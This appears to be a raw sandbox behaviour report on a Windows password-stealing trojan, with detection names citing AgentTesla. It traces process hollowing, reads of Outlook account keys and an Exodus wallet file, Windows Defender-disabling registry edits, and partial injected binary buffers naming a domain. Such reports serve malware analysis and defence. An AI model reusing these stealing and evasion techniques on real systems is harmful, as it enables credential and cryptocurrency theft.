RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0
registry HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
registry HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
registry HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
process axcxcvhgfc.exe useragent Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
process KqbKspamd9.exe useragent zipo
process KqbKspamd9.exe useragent daso
process oxcxcvhgfc.exe useragent
Process injection Process 1684 called NtSetContextThread to modify thread in remote process 2524
Process injection Process 260 called NtSetContextThread to modify thread in remote process 1188
Process injection Process 2504 called NtSetContextThread to modify thread in remote process 3056
Process injection Process 2632 called NtSetContextThread to modify thread in remote process 2408
Process injection Process 2552 called NtSetContextThread to modify thread in remote process 2984
Process injection Process 1016 called NtSetContextThread to modify thread in remote process 2164
Process injection Process 736 called NtSetContextThread to modify thread in remote process 1920
Process injection Process 2620 called NtSetContextThread to modify thread in remote process 1164
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4447323
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000004f4
process_identifier: 2524
1 0 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4302468
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000004fc
process_identifier: 1188
1 0 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4245278
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000398
process_identifier: 3056
1 0 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4291211
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002ac
process_identifier: 2408
1 0 0

NtSetContextThread

registers.eip: 77365248
registers.esp: 53935056
registers.edi: 0
registers.eax: 4361964
registers.ebp: 431460
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000534
process_identifier: 2984
1 0 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4219246
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002ac
process_identifier: 2164
1 0 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4209646
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002ac
process_identifier: 1920
1 0 0

NtSetContextThread

registers.eip: 5348
registers.esp: 69242152
registers.edi: 0
registers.eax: 4200932
registers.ebp: 5344
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000524
process_identifier: 1164
1 0 0
file C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
Process injection Process 1684 resumed a thread in remote process 2524
Process injection Process 260 resumed a thread in remote process 1188
Process injection Process 2504 resumed a thread in remote process 3056
Process injection Process 2632 resumed a thread in remote process 2408
Process injection Process 2552 resumed a thread in remote process 2984
Process injection Process 1016 resumed a thread in remote process 2164
Process injection Process 736 resumed a thread in remote process 1920
Process injection Process 2620 resumed a thread in remote process 1164
Process injection Process 1940 resumed a thread in remote process 2316
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000004f4
suspend_count: 1
process_identifier: 2524
1 0 0

NtResumeThread

thread_handle: 0x000004fc
suspend_count: 1
process_identifier: 1188
1 0 0

NtResumeThread

thread_handle: 0x00000398
suspend_count: 1
process_identifier: 3056
1 0 0

NtResumeThread

thread_handle: 0x000002ac
suspend_count: 1
process_identifier: 2408
1 0 0

NtResumeThread

thread_handle: 0x00000534
suspend_count: 1
process_identifier: 2984
1 0 0

NtResumeThread

thread_handle: 0x000002ac
suspend_count: 1
process_identifier: 2164
1 0 0

NtResumeThread

thread_handle: 0x000002ac
suspend_count: 1
process_identifier: 1920
1 0 0

NtResumeThread

thread_handle: 0x00000524
suspend_count: 1
process_identifier: 1164
1 0 0

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2316
1 0 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Time & API Arguments Status Return Repeated

WNetGetProviderNameW

net_type: 0x00250000
1222 0
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKDZ.75637
FireEye Generic.mg.e02ae8a88df1daa8
Cyren W32/MSIL_Agent.BZK.gen!Eldorado
Symantec Scr.Malcode!gdn30
ESET-NOD32 a variant of MSIL/Kryptik.ABGJ
APEX Malicious
Avast Win32:MalwareX-gen [Trj]
Kaspersky HEUR:Trojan-PSW.MSIL.Agensla.gen
BitDefender Trojan.GenericKDZ.75637
Ad-Aware Trojan.GenericKDZ.75637
Sophos ML/PE-A
Emsisoft Trojan.GenericKDZ.75637 (B)
Paloalto generic.ml
MAX malware (ai score=89)
Microsoft Trojan:MSIL/AgentTesla.BFF!MTB
Malwarebytes Spyware.TelegramBot
SentinelOne Static AI - Suspicious PE
Fortinet MSIL/Kryptik.ZXG!tr
MaxSecure Trojan.Malware.300983.susgen
AVG Win32:MalwareX-gen [Trj]
Panda Trj/GdSda.A
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 1684
1 0 0

NtResumeThread

thread_handle: 0x00000154
suspend_count: 1
process_identifier: 1684
1 0 0

NtResumeThread

thread_handle: 0x00000190
suspend_count: 1
process_identifier: 1684
1 0 0

NtResumeThread

thread_handle: 0x000002a4
suspend_count: 1
process_identifier: 1684
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtSetContextThread

registers.eip: 1920740228
registers.esp: 2542248
registers.edi: 2542424
registers.eax: 14305600
registers.ebp: 2542468
registers.edx: 1
registers.ebx: 0
registers.esi: 0
registers.ecx: 32
thread_handle: 0x000000e8
process_identifier: 1684
1 0 0

NtResumeThread

thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 1684
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtGetContextThread

thread_handle: 0x000000e8
1 0 0

NtResumeThread

thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 1684
1 0 0

NtResumeThread

thread_handle: 0x000003e0
suspend_count: 1
process_identifier: 1684
1 0 0

CreateProcessInternalW

thread_identifier: 2540
thread_handle: 0x0000054c
process_identifier: 260
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000554
1 1 0

CreateProcessInternalW

thread_identifier: 2764
thread_handle: 0x000004f4
process_identifier: 2524
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\zxcvb.exe
track: 1
command_line: "{path}"
filepath_r: C:\Users\test22\AppData\Local\Temp\zxcvb.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000004ec
1 1 0

NtGetContextThread

thread_handle: 0x000004f4
1 0 0

NtAllocateVirtualMemory

process_identifier: 2524
region_size: 598016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004ec
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÌNäˆ/ŠOˆ/ŠOˆ/ŠOÓG‰N™/ŠOÓGN4/ŠOÓGN‰/ŠO]BŽN›/ŠO]B‰N/ŠO]BNÚ/ŠOÓGŽN‘/ŠOÓGŒN‰/ŠOÓG‹N“/ŠOˆ/‹Ox/ŠOAƒN‡/ŠOAˆN‰/ŠORichˆ/ŠOPELIJW`à Žt[Ü @ @ÐBÀL[Ø8HØ@ ¤.text}ŒŽ `.rdataP¸ º’@@.data\`LL@À.relocL[À\˜@B
base_address: 0x00400000
process_identifier: 2524
process_handle: 0x000004ec
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 2524
process_handle: 0x000004ec
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0046a000
process_identifier: 2524
process_handle: 0x000004ec
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00486000
process_identifier: 2524
process_handle: 0x000004ec
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0048c000
process_identifier: 2524
process_handle: 0x000004ec
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2524
process_handle: 0x000004ec
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4447323
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000004f4
process_identifier: 2524
1 0 0

NtResumeThread

thread_handle: 0x000004f4
suspend_count: 1
process_identifier: 2524
1 0 0

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 260
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 260
1 0 0

NtResumeThread

thread_handle: 0x00000198
suspend_count: 1
process_identifier: 260
1 0 0

NtResumeThread

thread_handle: 0x000002a4
suspend_count: 1
process_identifier: 260
1 0 0

NtResumeThread

thread_handle: 0x000003e0
suspend_count: 1
process_identifier: 260
1 0 0

CreateProcessInternalW

thread_identifier: 2120
thread_handle: 0x0000054c
process_identifier: 2632
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\oxcxcvhgfc.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\oxcxcvhgfc.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\oxcxcvhgfc.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000554
1 1 0

CreateProcessInternalW

thread_identifier: 2472
thread_handle: 0x000004f8
process_identifier: 2112
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe
track: 1
command_line: "{path}"
filepath_r: C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000004f0
1 1 0

NtGetContextThread

thread_handle: 0x000004f8
1 0 0

NtAllocateVirtualMemory

process_identifier: 2112
region_size: 131072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004f0
3221225496 0

CreateProcessInternalW

thread_identifier: 1816
thread_handle: 0x000004fc
process_identifier: 1188
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe
track: 1
command_line: "{path}"
filepath_r: C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000004f4
1 1 0

NtGetContextThread

thread_handle: 0x000004fc
1 0 0

NtAllocateVirtualMemory

process_identifier: 1188
region_size: 131072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004f4
1 0 0

WriteProcessMemory

buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽ ˜$„¦°@@Оà\CODE°–˜ `DATAl°œ@ÀBSSÅÀ¤À.idatažÐ¤@À.reloc\à¬@PÄ@P
base_address: 0x00400000
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

buffer: @2‹À@@@\@ì @l$@ËÌÈÉ×ÏÈÍÎÛØÚÙÊÜÝÞßàáãäå@Error‹ÀRuntime error at 00000000‹À0123456789ABCDEFÿÿÿÿàO@‹À‹À@@J7<äºÏ¿}ªiFîµä[Jú-EœÝ]³QçëqØ'ÓØ'ÓØ'ÖØ7nØ$ÓsØ$ÓsØ$nsØ7ÓsØ7ÖsØ$ÓØ7Ø7ÖØ7ÖsØ$ÓØ$nsØ$nsØ7Ø$ÓØ$nsØ$nsØ7ÖsØ$ÓsØÔØ'ØØsØXØ$ÓØ'ÖØqØ'ÖØ–áveÛe3ôs>v÷†E±Yêá)­Vû˜Ar5d2Š'òÂØMY‰ pê5ù©ñÌ-þ+~•R¶Ö”æÐvMºoß3 v§·5v…ÅÞƒ¸`‡6©¤á þáx.¢WŽ‹ï)b!ò²jíïz´Ì·|X—¸q/Õæ?dEzãîs£‹3Ãhp>4Ǝ7èˆJ|—úðØèëá¾iAò¡úèÌ3áHþ‰‡ˆíG\†rgã@À Œ¥[\ë¸?áRÃénS ÑÒ-´¼;ÐÍñ[MQ¶SEvr]‚`„U¥’ÝêŽ(èú†mü'~àÖ.‘ÚÅÂÅÈ3Â%G°’j°Uî½S:Ì¦æä[½V€¿v™z½åÁL}¸<ÿ,9ŠÞýžV_‹ƒ:Â9 ‘牽˜W‡ù™ÙÔەoŸSûËۓ`Qé6ñ¡àw—Ëm¥Anm'o-”°aÃе1ä¨ 5[þ'Çè ©Ð¦¿q ¤ÞÆ +ºê$›gÌ7¶G~Ø: ðDºÜÑk½´úÓæ`¸{ÈQÖÎ*<A…æ>5²+X2`*ÿ0e¢÷¼Aâ@ŽPD„%ÌÐÒ:¨»eŠfk®Z‹¨ÃÌPÒÕ*”cÕéN{» “¨¤…¦b«?O±óÝ0ZR‡ÔžèÌÚÃOË©¤×`TwR\ŽÀàÄËÃÐÃsS¦@O±j¹ ›}¢ì J˜g_ÍYljò‘ ˜@Ž'”¸…PÂZ°)zˆãp>cƒŒXgǼ|½\ÏODn…á)ü7Lôû8ažŒ³Ô´:3ªÆô딛¥ø‘GgPnº1½·Õ“Ô^)õ/2{ۘ¸<T¾i#©È7ný_Fû^îˆnB!ôëäRÛc-dèmàÇ«>WÆÄN䨂«$há:_p”$Öd^}QÏ ˜kï8áeÏÌË%VŒ¿âFNØ\ðø•G;æ1Èy¤SÇ,•„°!#fñމÄþ j®Þ Ø|íälçÇ+ÆÚ E—Å Å$ŒÜ›¶Dë Í!kù,ú"dlQ(° ÇMIÎ,p#°)]”ÕÙ9i-0‚àl&‘®ª!YіoPÝ+¾‡9•}\±¡©Ù.¿4#D.•§×è¼R I±£ç— 1ÔTû_v¿tÂmÿóJQ÷Ð\pk+Fæ*_h:÷Ù ‡æÄ £ 8 c+-’û2_öš0ýcQò¸ dt‰µ+ûÞ™¸¦åð‰#t êqêR(PY» ïÀ(¢#ÓϘÆ”ÌzÓ ¯N$ÇAÇAôÆApÇA¤ÆA„ÇA@ÇAhÇAlÆA,ÇA¼ÆAÇA°ÆAÆAÄÆA´°A”ÇAÇAˆÇA(ÈA\ÇAüÆA4ÇA|ÆAŒÆAìÆA ÇA<ÇA¸°AèÆA¤ÇA°°AÀÆAŒÇA¸ÆAdÆA°ÇAðÆA ÇA´ÆA(ÇAÈÇAذA¼°A˜ÆA ÇAÇAÇAœÆA ÆA8ÇA¬ÆAPÇA¬ÇAˆÆALÇAøÆAÌÆADÇA`ÇA¬°A ÈA¨ÇA˜ÇAÇAÈÆA€ÆAœÇA”ÆA0ÇAhÆAHÇA´ÇAveronika.ac.ug
base_address: 0x0041b000
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

buffer: ,ÒÜÐ ÔHÑXÔXјÔhÑàÔxÑÕ€Ñ8ՐѺÖðÑ*× Òp× Ò:ÒRÒjÒ‚ÒžÒ¬Ò¼ÒÈÒÖÒæÒÓÓ$Ó:ÓPÓbÓtӊӜӮӼÓÊÓÖÓòÓþÓÔ,Ô>ÔLÔfÔzÔŠÔ¦Ô¶ÔÌÔîÔÕ Õ.ÕFÕRÕZÕfÕxÕˆÕ˜Õ¦Õ¶ÕÆÕØÕìÕÖÖ.ÖBÖPÖ`ÖrÖ~֌֚֮ÖÄÖÔÖäÖðÖ× ×6×B×V×^×z׊×kernel32.dllDeleteCriticalSectionLeaveCriticalSectionEnterCriticalSectionInitializeCriticalSectionVirtualFreeVirtualAllocLocalFreeLocalAllocGetTickCountQueryPerformanceCounterGetVersionGetCurrentThreadIdWideCharToMultiByteMultiByteToWideCharGetThreadLocaleGetStartupInfoAGetModuleFileNameAGetLocaleInfoAGetCommandLineAFreeLibraryExitProcessWriteFileUnhandledExceptionFilterRtlUnwindRaiseExceptionGetStdHandleuser32.dllGetKeyboardTypeMessageBoxACharNextAadvapi32.dllRegQueryValueExARegOpenKeyExARegCloseKeyoleaut32.dllSysFreeStringSysReAllocStringLenSysAllocStringLenkernel32.dllGetModuleHandleAadvapi32.dllRegOpenKeyExARegEnumKeyAFreeSidkernel32.dllWriteFileSleepLocalFreeLoadLibraryExWLoadLibraryAGlobalUnlockGlobalLockGetTickCountGetSystemInfoGetProcAddressGetModuleHandleAGetModuleFileNameAGetFileAttributesWGetCurrentProcessIdGetCurrentProcessFreeLibraryFindNextFileWFindFirstFileWFindCloseExitProcessDeleteFileWCreateDirectoryWCopyFileWgdi32.dllSelectObjectDeleteObjectDeleteDCCreateCompatibleDCCreateCompatibleBitmapBitBltuser32.dllReleaseDCGetSystemMetricsGetDCCharToOemBuffAole32.dllOleInitializeCoCreateInstance
base_address: 0x0041d000
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0041e000
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4302468
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000004fc
process_identifier: 1188
1 0 0

NtResumeThread

thread_handle: 0x000004fc
suspend_count: 1
process_identifier: 1188
1 0 0

NtResumeThread

thread_handle: 0x00000144
suspend_count: 1
process_identifier: 2524
1 0 0

CreateProcessInternalW

thread_identifier: 2520
thread_handle: 0x000007cc
process_identifier: 2504
current_directory: C:\Users\test22\AppData\LocalLow
filepath: C:\Users\test22\AppData\Local\Temp\lGN88VeVbt.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\lGN88VeVbt.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\lGN88VeVbt.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007d4
1 1 0

CreateProcessInternalW

thread_identifier: 604
thread_handle: 0x000007cc
process_identifier: 2552
current_directory: C:\Users\test22\AppData\LocalLow
filepath: C:\Users\test22\AppData\Local\Temp\KqbKspamd9.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\KqbKspamd9.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\KqbKspamd9.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007d8
1 1 0

CreateProcessInternalW

thread_identifier: 1116
thread_handle: 0x0000079c
process_identifier: 1016
current_directory: C:\Users\test22\AppData\LocalLow
filepath: C:\Users\test22\AppData\Local\Temp\IlgCQ4S1cW.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\IlgCQ4S1cW.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\IlgCQ4S1cW.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007c0
1 1 0

CreateProcessInternalW

thread_identifier: 1764
thread_handle: 0x000007d0
process_identifier: 736
current_directory: C:\Users\test22\AppData\LocalLow
filepath: C:\Users\test22\AppData\Local\Temp\aPMMzOSlXz.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\aPMMzOSlXz.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\aPMMzOSlXz.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007d8
1 1 0